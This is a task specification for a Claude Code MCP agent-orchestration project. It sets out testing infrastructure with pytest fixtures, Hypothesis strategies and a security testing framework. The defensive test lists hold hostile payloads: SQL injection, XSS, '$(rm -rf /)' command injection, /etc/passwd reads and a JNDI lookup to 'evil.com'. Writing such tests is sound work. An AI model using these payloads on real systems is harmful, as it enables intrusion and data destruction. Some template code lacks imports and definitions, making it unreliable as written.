Claude Code MCP - Agent Orchestration Platform

TASK_13.md•18.9 KiB

# TASK_13: Testing Infrastructure & Framework Setup **Created By**: Adder_1 | **Priority**: HIGH | **Duration**: 4 hours **Technique Focus**: All ADDER+ techniques + Property-based testing + Security testing **Size Constraint**: Target <200 lines/module, Max 300 if splitting awkward ## 🚦 Status & Assignment **Status**: COMPLETE **Assigned**: Adder_1 **Dependencies**: None (Parallel infrastructure task) **Blocking**: All future testing (enables TASK_1-12 validation) ## 📖 Required Reading (Complete before starting) - [x] **Testing Strategy**: `tests/TESTING.md` - Current test status and planned framework - [x] **Architecture**: `ARCHITECTURE.md` - System components requiring testing - [x] **FastMCP Protocol**: `development/protocols/FASTMCP_PYTHON_PROTOCOL.md` - Integration patterns - [ ] **Security Contracts**: Understanding security testing requirements ## 🎯 Objective & Context **Goal**: Establish comprehensive testing infrastructure with property-based testing, security validation, and CI/CD pipeline **Context**: Foundation for all future development validation - enables immediate testing of TASK_1-12 deliverables <thinking> Testing Infrastructure Analysis: 1. Current state: 0 tests, no framework setup 2. Need comprehensive testing strategy covering all ADDER+ techniques 3. Property-based testing with Hypothesis for edge case discovery 4. Security testing framework for penetration testing 5. Performance benchmarking for concurrent agent operations 6. Mock infrastructure for iTerm2 and Claude Code dependencies 7. CI/CD integration for automated testing 8. Test data management and fixtures </thinking> ## ✅ Implementation Subtasks (Sequential completion) ### Phase 1: Core Testing Framework Setup - [x] **Subtask 1.1**: Configure pytest with asyncio, coverage, and parallel execution - [x] **Subtask 1.2**: Install and configure Hypothesis for property-based testing - [x] **Subtask 1.3**: Setup security testing tools (bandit, safety, pytest-security) - [x] **Subtask 1.4**: Configure performance benchmarking with pytest-benchmark ### Phase 2: Mock Infrastructure & Fixtures - [x] **Subtask 2.1**: Create comprehensive test fixtures for all domain types - [x] **Subtask 2.2**: Implement mock iTerm2 manager for isolated testing - [x] **Subtask 2.3**: Create mock Claude Code integration for unit testing - [x] **Subtask 2.4**: Setup temporary filesystem and session mocking ### Phase 3: Property-Based Testing Foundation - [x] **Subtask 3.1**: Define Hypothesis strategies for all domain types - [x] **Subtask 3.2**: Create property-based test templates for security validation - [x] **Subtask 3.3**: Implement concurrent operation testing framework - [x] **Subtask 3.4**: Add input fuzzing and edge case generation ### Phase 4: CI/CD Integration & Documentation - [x] **Subtask 4.1**: Create GitHub Actions workflow for automated testing - [x] **Subtask 4.2**: Setup coverage reporting and quality gates - [x] **Subtask 4.3**: Add security scanning and vulnerability detection - [x] **Subtask 4.4**: Create comprehensive testing documentation and guidelines ## 🔧 Implementation Files & Specifications **Files to Create/Modify**: - `tests/conftest.py` - Global pytest configuration and fixtures (Target: <200 lines) - `tests/fixtures/domain.py` - Domain-specific test fixtures (Target: <250 lines) - `tests/mocks/iterm_manager.py` - iTerm2 manager mocking infrastructure (Target: <200 lines) - `tests/mocks/claude_code.py` - Claude Code integration mocking (Target: <150 lines) - `tests/strategies/hypothesis_strategies.py` - Hypothesis strategies for all types (Target: <200 lines) - `tests/properties/base_properties.py` - Base property-based test templates (Target: <200 lines) - `tests/security/penetration_tests.py` - Security testing framework (Target: <250 lines) - `tests/performance/benchmarks.py` - Performance benchmark suite (Target: <200 lines) - `.github/workflows/test.yml` - CI/CD pipeline configuration - `pyproject.toml` - Updated with test configuration - `tests/README.md` - Comprehensive testing documentation **Key Requirements**: - Pytest with asyncio support for async/await testing - Hypothesis for property-based testing with security focus - Mock infrastructure that doesn't require iTerm2 or Claude Code - Performance benchmarking for concurrency and resource usage - Security testing with input fuzzing and penetration testing - CI/CD integration with quality gates and coverage reporting ## 🏗️ Modularity Strategy **Size Management**: - Separate testing concerns into focused modules (mocks, fixtures, strategies) - Use composition for complex test scenarios - Break property-based tests into reusable templates - Keep individual test files focused and maintainable **Organization Principles**: - Single responsibility per testing module - Clear separation between unit, integration, and property-based tests - Minimal coupling between test components - Maximum reusability of fixtures and mocking infrastructure ## ✅ Success Criteria & Verification **Completion Requirements**: - [ ] Complete pytest framework with asyncio and coverage support - [ ] Hypothesis property-based testing framework operational - [ ] Comprehensive mock infrastructure for external dependencies - [ ] Security testing framework with input fuzzing capabilities - [ ] Performance benchmarking suite for critical operations - [ ] CI/CD pipeline with automated testing and quality gates - [ ] Complete testing documentation and guidelines - [ ] Example tests demonstrating all testing capabilities **Quality Gates**: - Framework: pytest executes successfully with 0 tests initially - Mocking: Mock infrastructure works without external dependencies - Properties: Hypothesis generates valid test cases for all domain types - Security: Security testing framework detects vulnerabilities - Performance: Benchmark suite measures critical operation performance - CI/CD: Automated pipeline runs successfully on code changes ## 🔄 Handoff Information **Next Task Dependencies**: All TASK_1-12 will use this testing infrastructure **Integration Points**: Testing framework supports all system components **Future Considerations**: Framework extensible for additional testing needs ## 📋 Implementation Templates ### **Global Test Configuration** ```python # tests/conftest.py import pytest import asyncio from pathlib import Path from typing import AsyncGenerator, Generator from unittest.mock import AsyncMock, MagicMock from tests.mocks.iterm_manager import MockiTermManager from tests.mocks.claude_code import MockClaudeCodeManager from tests.fixtures.domain import * # Import all domain fixtures # Pytest configuration pytest_plugins = ["pytest_asyncio"] @pytest.fixture(scope="session") def event_loop(): """Create an instance of the default event loop for the test session.""" loop = asyncio.get_event_loop_policy().new_event_loop() yield loop loop.close() @pytest.fixture async def mock_iterm_manager() -> AsyncGenerator[MockiTermManager, None]: """Provide mock iTerm2 manager for testing without iTerm2 dependency.""" manager = MockiTermManager() await manager.initialize() try: yield manager finally: await manager.cleanup() @pytest.fixture async def mock_claude_manager() -> AsyncGenerator[MockClaudeCodeManager, None]: """Provide mock Claude Code manager for testing without Claude Code dependency.""" manager = MockClaudeCodeManager() await manager.initialize() try: yield manager finally: await manager.cleanup() @pytest.fixture def temp_session_root(tmp_path: Path) -> Path: """Provide temporary directory for session testing.""" session_dir = tmp_path / "test_session" session_dir.mkdir() # Create basic session structure (session_dir / ".claude_session").mkdir() (session_dir / "development").mkdir() (session_dir / "development" / "tasks").mkdir() return session_dir @pytest.fixture def sample_todo_content() -> str: """Provide sample TODO.md content for testing.""" return '''# Project Task Management Dashboard **Project**: Test Project **Last Updated**: 2025-06-26 by Adder_1 ## Current Assignments | Task | Status | Agent | Priority | Dependencies | |------|--------|-------|----------|--------------| | TASK_1 | IN_PROGRESS | Adder_3 | HIGH | None | | TASK_2 | IN_PROGRESS | Adder_4 | HIGH | None | ''' ``` ### **Hypothesis Strategies** ```python # tests/strategies/hypothesis_strategies.py from hypothesis import strategies as st from typing import NewType import string import re # Basic type strategies AgentId = NewType('AgentId', str) SessionId = NewType('SessionId', str) # Agent name strategy (Agent_#) agent_name_strategy = st.builds( lambda n: f"Agent_{n}", st.integers(min_value=1, max_value=999) ) # Valid session ID strategy session_id_strategy = st.builds( lambda prefix, uuid_part: f"{prefix}_{uuid_part}", st.sampled_from(["session", "dev", "prod"]), st.text( alphabet=string.ascii_lowercase + string.digits, min_size=8, max_size=16 ) ) # File path strategies safe_filename_strategy = st.text( alphabet=string.ascii_letters + string.digits + "_-.", min_size=1, max_size=50 ).filter(lambda x: not x.startswith('.') and x != '..' and x != '.') relative_path_strategy = st.builds( lambda parts: "/".join(parts), st.lists(safe_filename_strategy, min_size=1, max_size=5) ) # Security-focused strategies malicious_input_strategy = st.one_of([ st.text(min_size=1, max_size=1000), # General text st.sampled_from([ # Common injection patterns "'; DROP TABLE agents; --", "<script>alert('xss')</script>", "../../../etc/passwd", "$(rm -rf /)", "'; cat /etc/passwd; echo '", "\\x00\\x00\\x00\\x00", "' OR '1'='1", "${jndi:ldap://evil.com/a}" ]), st.binary(min_size=1, max_size=100).map(lambda x: x.decode('utf-8', errors='ignore')) ]) # Agent configuration strategies agent_config_strategy = st.builds( dict, model=st.sampled_from(["sonnet-3.5", "opus-3", "haiku-3"]), no_color=st.booleans(), verbose=st.booleans(), memory_limit=st.integers(min_value=128, max_value=2048) ) def create_property_test_strategy(type_class): """Create a Hypothesis strategy for testing type validation properties.""" if hasattr(type_class, '__annotations__'): field_strategies = {} for field_name, field_type in type_class.__annotations__.items(): if field_type == str: field_strategies[field_name] = st.text(min_size=0, max_size=100) elif field_type == int: field_strategies[field_name] = st.integers() elif field_type == bool: field_strategies[field_name] = st.booleans() # Add more type mappings as needed return st.builds(type_class, **field_strategies) else: return st.none() ``` ### **Property-Based Test Templates** ```python # tests/properties/base_properties.py from hypothesis import given, strategies as st, assume import pytest from typing import Any, Callable, TypeVar T = TypeVar('T') def test_serialization_roundtrip_property( serialize_func: Callable[[T], str], deserialize_func: Callable[[str], T], strategy: st.SearchStrategy[T] ): """Property: Serialization and deserialization should be roundtrip safe.""" @given(data=strategy) def roundtrip_test(data: T): serialized = serialize_func(data) deserialized = deserialize_func(serialized) assert deserialized == data return roundtrip_test def test_input_validation_property( validation_func: Callable[[Any], bool], valid_strategy: st.SearchStrategy[Any], invalid_strategy: st.SearchStrategy[Any] ): """Property: Input validation should accept valid inputs and reject invalid ones.""" @given(valid_input=valid_strategy) def valid_inputs_accepted(valid_input): assert validation_func(valid_input) == True @given(invalid_input=invalid_strategy) def invalid_inputs_rejected(invalid_input): assume(invalid_input is not None) # Avoid None edge case assert validation_func(invalid_input) == False return valid_inputs_accepted, invalid_inputs_rejected def test_security_boundary_property( boundary_func: Callable[[Any], bool], malicious_strategy: st.SearchStrategy[Any] ): """Property: Security boundaries should never be bypassed by malicious input.""" @given(malicious_input=malicious_strategy) def security_boundary_holds(malicious_input): try: result = boundary_func(malicious_input) # If no exception, result should indicate rejection assert result == False or result is None except (ValueError, SecurityError, ValidationError): # Security exceptions are expected and acceptable pass except Exception as e: # Unexpected exceptions indicate potential security issues pytest.fail(f"Unexpected exception: {type(e).__name__}: {e}") return security_boundary_holds class PropertyTestBase: """Base class for property-based testing with common patterns.""" @staticmethod def assert_immutability(obj: Any, operation: Callable[[Any], Any]): """Assert that an operation doesn't modify the original object.""" original_state = repr(obj) # Capture state operation(obj) new_state = repr(obj) assert original_state == new_state, "Object was unexpectedly modified" @staticmethod def assert_idempotent(operation: Callable[[T], T], input_val: T): """Assert that an operation is idempotent (f(f(x)) == f(x)).""" result1 = operation(input_val) result2 = operation(result1) assert result1 == result2, "Operation is not idempotent" @staticmethod def assert_commutative(operation: Callable[[T, T], T], a: T, b: T): """Assert that an operation is commutative (f(a,b) == f(b,a)).""" result1 = operation(a, b) result2 = operation(b, a) assert result1 == result2, "Operation is not commutative" ``` ### **Security Testing Framework** ```python # tests/security/penetration_tests.py import pytest from hypothesis import given, strategies as st from typing import Any, List, Dict import asyncio from tests.strategies.hypothesis_strategies import malicious_input_strategy class SecurityTestFramework: """Comprehensive security testing framework for penetration testing.""" @staticmethod async def test_input_injection_resistance( input_handler: Callable[[str], Any], malicious_inputs: List[str] = None ): """Test resistance to various injection attacks.""" default_malicious_inputs = [ "'; DROP TABLE agents; --", # SQL injection "<script>alert('xss')</script>", # XSS "../../../etc/passwd", # Path traversal "$(rm -rf /)", # Command injection "'; cat /etc/passwd; echo '", # Command chaining "\\x00\\x00\\x00\\x00", # Null byte injection "' OR '1'='1", # Authentication bypass "${jndi:ldap://evil.com/a}", # Log4j-style injection "{{7*7}}", # Template injection "javascript:alert('xss')", # JavaScript protocol ] test_inputs = malicious_inputs or default_malicious_inputs for malicious_input in test_inputs: try: result = await input_handler(malicious_input) # If no exception, result should be safely handled assert not _contains_unescaped_content(result, malicious_input) except (ValueError, SecurityError, ValidationError): # Expected security exceptions are acceptable pass except Exception as e: pytest.fail(f"Unexpected exception for input '{malicious_input}': {e}") @staticmethod @given(malicious_input=malicious_input_strategy) def test_boundary_enforcement_property( boundary_validator: Callable[[str], bool], malicious_input: str ): """Property-based test for security boundary enforcement.""" try: is_valid = boundary_validator(malicious_input) # Malicious inputs should be rejected assert not is_valid, f"Malicious input was accepted: {malicious_input[:50]}" except (SecurityError, ValidationError): # Security exceptions are expected pass @staticmethod async def test_privilege_escalation_resistance( privileged_operation: Callable[..., Any], unprivileged_context: Dict[str, Any] ): """Test resistance to privilege escalation attempts.""" try: result = await privileged_operation(**unprivileged_context) # Should either fail or return limited result assert _is_safe_result(result), "Privileged operation succeeded without proper authorization" except (PermissionError, SecurityError, AuthenticationError): # Expected security exceptions pass @staticmethod async def test_resource_exhaustion_resistance( resource_operation: Callable[..., Any], excessive_parameters: Dict[str, Any] ): """Test resistance to resource exhaustion attacks.""" import time start_time = time.time() try: result = await asyncio.wait_for( resource_operation(**excessive_parameters), timeout=10.0 # 10 second timeout ) elapsed = time.time() - start_time # Operation should complete quickly or be properly limited assert elapsed < 5.0, f"Operation took too long: {elapsed}s" assert _is_reasonable_resource_usage(result), "Excessive resource usage detected" except (asyncio.TimeoutError, ResourceLimitError): # Expected timeout or resource limit exceptions pass def _contains_unescaped_content(result: Any, malicious_input: str) -> bool: """Check if result contains unescaped malicious content.""" if isinstance(result, str): return malicious_input in result elif isinstance(result, dict): return any(malicious_input in str(v) for v in result.values()) return False def _is_safe_result(result: Any) -> bool: """Check if result is safe (limited/filtered).""" if result is None: return True if isinstance(result, dict) and result.get('error'): return True if isinstance(result, str) and len(result) < 1000: return True return False def _is_reasonable_resource_usage(result: Any) -> bool: """Check if result indicates reasonable resource usage.""" if isinstance(result, dict): size = result.get('size', 0) return size < 10_000_000 # 10MB limit return True ``` This testing infrastructure provides comprehensive coverage for all ADDER+ techniques with property-based testing, security validation, and CI/CD integration.

Loading blob content...

Latest Blog Posts

Redis vs ioredis vs valkey-glide
By punkpeye on January 26, 2026.
benchmark
Redis
valkey
Quickstart: Publish an MCP Server to the MCP Registry
By punkpeye on January 24, 2026.
mcp
official reference mirror
Official MCP Registry Server.json Requirements
By punkpeye on January 24, 2026.
mcp
official reference mirror

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/Nexus-Digital-Automations/Claude_Code_MCP_2'

If you have feedback or need assistance with the MCP directory API, please join our Discord server

TASK_13.md•18.9 KiB